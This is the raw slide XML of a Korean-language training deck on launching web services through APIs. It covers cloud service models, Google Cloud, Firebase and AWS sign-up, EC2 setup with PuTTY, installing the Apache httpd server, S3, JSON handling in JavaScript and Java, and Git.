            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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700"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-3365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ko-KR" sz="1800"/>
              <a:t>API로 웹 서비스 시작</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-2794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구글 클라우드 플랫폼</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-2794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Firebase functions 서비스</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-2794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ko-KR" sz="1400"/>
              <a:t>AWS(아마존 웹 서비스) EC2</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-18415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500"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0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ko-KR" sz="1800"/>
              <a:t>취업 역량 강화</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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우수 레퍼런스 분석 및 핵심 역량 교육(취업 역량 교육)</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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포트폴리오 작성 실습 및 프로젝트 레퍼런스 정리</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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ko-KR" sz="1400"/>
              <a:t>포트폴리오 작성 피드백 및 수정 진행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 부트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구현 실습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0" y="1564767"/>
            <a:ext cx="2697903" cy="412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87727"/>
            <a:ext cx="5321808" cy="168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15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3c8bf3e09_0_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/>
              <a:t>API로 웹 서비스 시작</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Google Shape;252;g143c8bf3e09_0_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/>
              <a:t>Part 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3392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클라우드의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 여러 가지 형태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IaaS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>아이아스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이에스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 err="1" smtClean="0"/>
              <a:t>Infrastruct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> as a Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>AWS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EC2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S3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기존 물리 장비를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>미들웨어와</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> 함께 묶어둔 추상화 서비스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err="1" smtClean="0"/>
              <a:t>가상머신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네트워크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운영체제 등의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>IT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>PaaS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>파스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 smtClean="0"/>
              <a:t>Platform as a Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>AWS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Beanstalk(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>빈스톡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Heroku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헤로쿠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앞에서 언급한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>IaaS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>에서 한번 더 추상화한 서비스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한번 더 추상화했기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SaaS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>사스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 smtClean="0"/>
              <a:t>Software as a Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>소프트웨어 서비스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드라이브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드랍박스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와탭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> 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203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3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800"/>
              <a:t>구글 클라우드 플랫폼 시작하기</a:t>
            </a:r>
            <a:endParaRPr sz="28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https://cloud.google.com/</a:t>
            </a:r>
            <a:endParaRPr sz="24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계정 생성과 VM 생성하기</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a: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ko-KR" sz="2000"/>
              <a:t>개인 신용 카드 정보를 등록해야 모든 서비스 사용.</a:t>
            </a:r>
            <a:endParaRPr sz="2000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9934" y="3522911"/>
            <a:ext cx="2767012" cy="281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145049" y="6361210"/>
            <a:ext cx="2472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https://bcho.tistory.com/1107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71475" y="303213"/>
            <a:ext cx="84677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API로 웹 서비스 시작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구글 클라우드 functions</a:t>
            </a:r>
            <a:endParaRPr sz="28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2000"/>
              <a:t>https://cloud.google.com/functions?hl=ko</a:t>
            </a:r>
            <a:endParaRPr sz="2000"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7321" y="2609850"/>
            <a:ext cx="5349330" cy="3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API로 웹 서비스 시작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457200" y="1466850"/>
            <a:ext cx="8229600" cy="101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구글 Firebase Functons</a:t>
            </a:r>
            <a:endParaRPr sz="28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800"/>
              <a:t>무료 사용이 중단되어서 프로젝트 업그레이드 해야 사용 가능.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"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774" y="2847976"/>
            <a:ext cx="500923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API로 웹 서비스 시작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API로 웹 서비스 시작</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Google Shape;280;p1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156448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400" dirty="0"/>
              <a:t>AWS(아마존 웹 서비스) </a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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349" y="2386584"/>
            <a:ext cx="5139691" cy="377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189039" y="6389787"/>
            <a:ext cx="24032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https://aws.amazon.com/ko/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API로 웹 서비스 시작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848600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ko-KR" sz="2400" dirty="0"/>
              <a:t>AWS란?</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1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800" dirty="0"/>
              <a:t>Amazon Web Services</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1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800" dirty="0" err="1"/>
              <a:t>아마존닷컴이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1800" dirty="0"/>
              <a:t> 제공하는 각종 원격 컴퓨팅 서비스</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2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600" dirty="0"/>
              <a:t>컴퓨팅</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2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600" dirty="0"/>
              <a:t>스토리지 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>콘텐츠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1600" dirty="0"/>
              <a:t> 전송</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2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600" dirty="0"/>
              <a:t>데이터베이스</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2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600" dirty="0"/>
              <a:t>네트워킹 등</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l" rtl="0"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ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>딥러닝</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0"/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5848" y="3886200"/>
            <a:ext cx="5358228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API로 웹 서비스 시작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400" dirty="0"/>
              <a:t>AWS(아마존 웹 서비스) EC2</a:t>
            </a:r>
            <a:endParaRPr sz="2400"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600" dirty="0"/>
              <a:t>Amazon Elastic Compute Cloud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600" dirty="0"/>
              <a:t>서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>인스턴스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1600" dirty="0"/>
              <a:t> 생성까지 단 몇 분</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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600" dirty="0"/>
              <a:t>사용한 만큼 지불</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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600" dirty="0"/>
              <a:t>모든 서비스를 다 사용하거나 가상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>머신을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1600" dirty="0"/>
              <a:t> 여러 대 설치하면 요금 발생 됨.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0"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568" y="3886200"/>
            <a:ext cx="4507992" cy="24610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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157467" y="6533748"/>
            <a:ext cx="84721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https://medium.com/@sophiamcleod99/advantages-to-build-cloud-applications-with-aws-d44c8d7ab2d5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AWS 무료 온라인 교육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800"/>
              <a:t>https://aws.amazon.com/ko/training/digital/</a:t>
            </a:r>
            <a:endParaRPr sz="2800"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338" y="2390775"/>
            <a:ext cx="5619362" cy="408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3c8bf3e09_0_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15" name="Google Shape;115;g143c8bf3e09_0_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/>
              <a:t>Part 01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Amazon AWS 서비스 가입</a:t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57200" y="1533526"/>
            <a:ext cx="8229600" cy="207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🞈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웹사이트 접속 :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571A5"/>
              </a:buClr>
              <a:buSzPts val="168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https://aws.amazon.com/ko/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🞈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회원가입: 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571A5"/>
              </a:buClr>
              <a:buSzPts val="168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무료계정 생성하기 </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Time"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Arial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</a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" sz="10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신용카드 정보와 지불 정보를 업데이트 해야 계정 생성 가능.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</a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" sz="10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계정 생성 하는 동안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1000" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Time"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>잠시 국제 전화 수신차단 해제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="10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 할 것.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</a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" sz="10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1달러 인출된다고 나옴(실제로 안 빠짐)</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Time"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0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</a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Time"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>계정 생성 완료 안내 끝나기 전에 전화 끊지 않기</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Time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311" name="Google Shape;311;p42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1266092" y="3612755"/>
            <a:ext cx="6762734" cy="2922757"/>
            <a:chOff x="1114699" y="3444769"/>
            <a:chExt cx="7187420" cy="3090741"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="312" name="Google Shape;312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23952" y="3444770"/>
              <a:ext cx="2096096" cy="3090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84626" y="3444769"/>
              <a:ext cx="1864023" cy="129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4699" y="3444769"/>
              <a:ext cx="1417178" cy="306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84626" y="4947369"/>
              <a:ext cx="1917493" cy="15632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지원 플랜 선택</a:t>
            </a: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/>
              <a:t>가격을 잘 확인 하세요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400"/>
              <a:t>일단 "무료" 선택</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/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6243" y="1700809"/>
            <a:ext cx="3963065" cy="476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요금 폭탄 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28" y="1918741"/>
            <a:ext cx="4747956" cy="435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3504" y="2039112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이것 저것 막 쓰다 보면 요금 폭탄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꼭 필요한 서비스만 사용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 하지 않을 때는 중지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4837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이메일 확인</a:t>
            </a:r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600"/>
              <a:t>Amazon에서 보내온 메일을 확인한다.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600"/>
              <a:t>단계별 학습 가이드를 제공한다.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/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668" y="2495187"/>
            <a:ext cx="3096345" cy="226760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3809963"/>
            <a:ext cx="2854052" cy="278466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1259" y="1613732"/>
            <a:ext cx="3059830" cy="28534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빠른 시작</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp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1412776"/>
            <a:ext cx="6684197" cy="52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빠른 시작</a:t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06" y="1916832"/>
            <a:ext cx="8655181" cy="419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 PC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Oracle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>VM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VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>가상머신</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 설치</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>     (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>또는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>VMware Workstation Player</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>가상머신</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 설치</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>)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CentOS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Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>리눅스의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iso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>로 설치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가상 환경이지만 네트워크 등 거의 모든 기능 사용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09" y="3445384"/>
            <a:ext cx="3779133" cy="303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124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79" y="1750505"/>
            <a:ext cx="6860724" cy="437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060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" y="1895780"/>
            <a:ext cx="8013192" cy="394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869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2" y="1799430"/>
            <a:ext cx="8138161" cy="452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79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34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2800"/>
              <a:t>JSON 데이터 사용</a:t>
            </a:r>
            <a:endParaRPr sz="28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1600"/>
              <a:t>JSON (JavaScript Object Notation)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1600"/>
              <a:t>JSON 자체는 객체가 아니다. 그냥 형식을 갖춘 문자열일 뿐이다.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1600"/>
              <a:t>JSON.parse()를 이용해서 JSON문자열을 자바스크립트 객체로 변환 가능.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="12573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1200"/>
              <a:t>또는 eval() 함수를 이용해서 객체로 변환 가능하나 잘 사용하지 않는다.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ko-KR" sz="1600"/>
              <a:t>JSON.stringify()로 자바스크립트 객체를 JSON 객체로 변환 가능.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"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85" y="4348367"/>
            <a:ext cx="2698412" cy="150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5423" y="4348367"/>
            <a:ext cx="4896458" cy="186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87549" y="6414673"/>
            <a:ext cx="84436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https://developer.mozilla.org/ko/docs/Web/JavaScript/Reference/Global_Objects/JSON/stringify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1955992"/>
            <a:ext cx="8046720" cy="310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001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1769"/>
            <a:ext cx="8229600" cy="381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30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2080249"/>
            <a:ext cx="8092440" cy="320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615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배포판의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 종류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" y="2109789"/>
            <a:ext cx="8092440" cy="243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73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기본 명령어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3" y="1604185"/>
            <a:ext cx="5226939" cy="451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hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261712" y="6358200"/>
            <a:ext cx="4432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err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ivis.kr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/images/e/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>e9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2018_Unix_command_vi.pdf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95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인스턴스 시작 검토</a:t>
            </a:r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350" name="Google Shape;35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887" y="1645831"/>
            <a:ext cx="8233347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private key file 다운로드</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Google Shape;35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/>
              <a:t>키 이름을 넣고 다운로드 받아야 한다.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400"/>
              <a:t>외부에서 SSH 접속 등의 작업에 필요하다.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400"/>
              <a:t>쉽게 접근 가능한 곳에 잘 보관 한다.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"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2636912"/>
            <a:ext cx="7659315" cy="38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시작 상태</a:t>
            </a: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3" y="1628800"/>
            <a:ext cx="8186849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인스턴스 시작</a:t>
            </a:r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371" name="Google Shape;37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552" y="2367936"/>
            <a:ext cx="8079808" cy="298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Puttygen 다운로드</a:t>
            </a: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/>
              <a:t>Puttygen 다운로드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400"/>
              <a:t>http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html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492896"/>
            <a:ext cx="58864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30" name="Google Shape;130;p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0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JSONObject 라이브러리 (JSON In Java)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2400"/>
              <a:t>JAVA 프로젝트에서 JSON 사용 시 유용하다.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"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068" y="2782110"/>
            <a:ext cx="5595631" cy="231518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9051" y="4145029"/>
            <a:ext cx="4067296" cy="234386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3" name="Google Shape;133;p6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="778213" y="5319344"/>
            <a:ext cx="350195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&lt;dependency&gt;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&lt;groupId&gt;org.json&lt;/groupId&gt;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&lt;artifactId&gt;json&lt;/artifactId&gt;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&lt;version&gt;20220320&lt;/version&gt;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&lt;/dependency&gt;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pem을 ppk로 변환</a:t>
            </a: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35" y="1844824"/>
            <a:ext cx="7363141" cy="446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ppk로 변환된 파일을 사용</a:t>
            </a:r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700808"/>
            <a:ext cx="7918629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인스턴스에 연결 정보 확인</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="396" name="Google Shape;39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1412776"/>
            <a:ext cx="6696744" cy="525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putty 를 이용해서 연결</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="402" name="Google Shape;40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772816"/>
            <a:ext cx="7308304" cy="46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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500034" y="3212976"/>
            <a:ext cx="7715304" cy="136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/>
              <a:t>AWS에 httpd 설치</a:t>
            </a:r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ko-KR"/>
              <a:t>(아파치 웹 서버 - httpd)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yum 패키지 업데이트</a:t>
            </a:r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$ sudo yum update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5715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ko-KR" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(주의)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="5715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ko-KR" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>red-hat 계열의 리눅스와 </a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="5715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ko-KR" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ubuntu 계열의 리눅스 명령어가 다름.</a:t>
            </a:r>
            <a:endParaRPr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httpd</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Google Shape;420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httpd (hypertext transfer protocol deamon)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HTTP 서비스 제공 데몬 서버</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="91440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포트 : 80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서버 패키지 : apache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400"/>
              <a:t>서버에서 웹 페이지 전송 서비스를 제공해주는 프로그램</a:t>
            </a:r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httpd 개념</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="426" name="Google Shape;42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077" y="2636912"/>
            <a:ext cx="74485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httpd 설치</a:t>
            </a:r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$ sudo yum install httpd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/>
              <a:t>설치가 완료 시 /var/www/폴터 생성 됨.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/>
              <a:t>그 폴더의 html 폴더 안에 자신의 홈페이지를 넣어주면 됨.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/>
              <a:t>소스업로드 하기</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="Google Shape;438;p6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ko-KR"/>
              <a:t>winscp</a:t>
            </a:r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4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JSONObject / JSONArray toString 사용</a:t>
            </a:r>
            <a:endParaRPr sz="28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400"/>
              <a:t>https://cafe.naver.com/comstudy21/14006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400"/>
              <a:t>https://cafe.naver.com/comstudy21/14007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400"/>
              <a:t>https://cafe.naver.com/comstudy21/14008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400"/>
              <a:t>https://cafe.naver.com/comstudy21/14009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1400"/>
              <a:t>https://cafe.naver.com/comstudy21/14010</a:t>
            </a:r>
            <a:endParaRPr sz="1400"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250" y="2799867"/>
            <a:ext cx="4037832" cy="3840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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="268501" y="6117513"/>
            <a:ext cx="37577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https://stleary.github.io/JSON-java/index.html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https://www.baeldung.com/java-org-json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WinSCP를 통한 파일 전송</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="Google Shape;445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80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네이버에서 "WinSCP" 검색 후 다운로드.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46" name="Google Shape;44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278" y="2405709"/>
            <a:ext cx="4686202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2405708"/>
            <a:ext cx="3537913" cy="3183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접근 권한 문제</a:t>
            </a:r>
            <a:endParaRPr/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024" y="1556792"/>
            <a:ext cx="7733966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접근 권한 문제</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="459" name="Google Shape;45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988840"/>
            <a:ext cx="8199451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httpd 서비스 실행</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Google Shape;465;p6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18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400"/>
              <a:t>$ sudo service httpd start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800"/>
              <a:t>httpd 서버 프로그램 실행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800"/>
              <a:t>한번 실행하면 파일 수정 되어도 자동 반영</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a: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600"/>
              <a:t>참고문헌 https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/install-LAMP.html</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="466" name="Google Shape;46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1" y="3501008"/>
            <a:ext cx="4932347" cy="2669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웹 서버 포트 설정</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="472" name="Google Shape;47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204864"/>
            <a:ext cx="85344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S3 스토리지 사용하기</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="Google Shape;478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2000"/>
              <a:t>관련 URL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http://pyrasis.com/book/TheArtOfAmazonWebServices/Chapter11</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a: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479" name="Google Shape;47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640" y="2564904"/>
            <a:ext cx="4575795" cy="3634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S3 스토리지 사용하기</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="485" name="Google Shape;485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2062" y="1600200"/>
            <a:ext cx="6199876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S3 스토리지 사용하기</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="491" name="Google Shape;491;p6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41615" y="1600200"/>
            <a:ext cx="646076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EB 생성</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="497" name="Google Shape;497;p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8422" y="1768904"/>
            <a:ext cx="6591930" cy="43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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182553" y="1189247"/>
            <a:ext cx="1285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교재 p.664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/>
              <a:t>Git 사용하기</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="Google Shape;504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/>
              <a:t>Git과 Github를 이용한 프로젝트 관리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ko-KR" sz="2000"/>
              <a:t>https://docs.aws.amazon.com/ko_kr/codecommit/latest/userguide/how-to-basic-git.html</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
